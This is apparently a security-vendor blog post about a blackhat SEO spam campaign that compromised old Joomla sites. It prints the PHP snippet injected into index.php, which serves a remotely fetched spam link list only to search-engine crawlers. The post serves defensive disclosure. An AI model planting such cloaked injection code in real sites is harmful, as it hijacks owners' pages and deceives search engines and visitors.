Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14). This is how they show up in our scanner:

They all had the following code added to their index.php file to contact and to retrieve the list of links to show up:

if (preg_match(‘/live|msn|yahoo|Google|ask|aol|bot|google/’, $_SERVER[‘HTTP_USER_AGENT’])) {
$get = “”.$_SERVER[‘HTTP_HOST’];
if (function_exists(“curl_init”)) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $get);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
echo $out;
} else {
$out = file_get_contents($get);
echo $out;

These are some of the sites we identified so far: (some .govs, some small banks, many russian, etc). – Grameen Bank – Ecuador .gov – Ecuador .gov – Ecuador .gov

If you are using Joomla, make sure it is upgraded to avoid getting hacked. You can also check if your site is infected by scanning it in here:

Having security problems? Malware? Blacklisted? We can fix it for you:

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Share This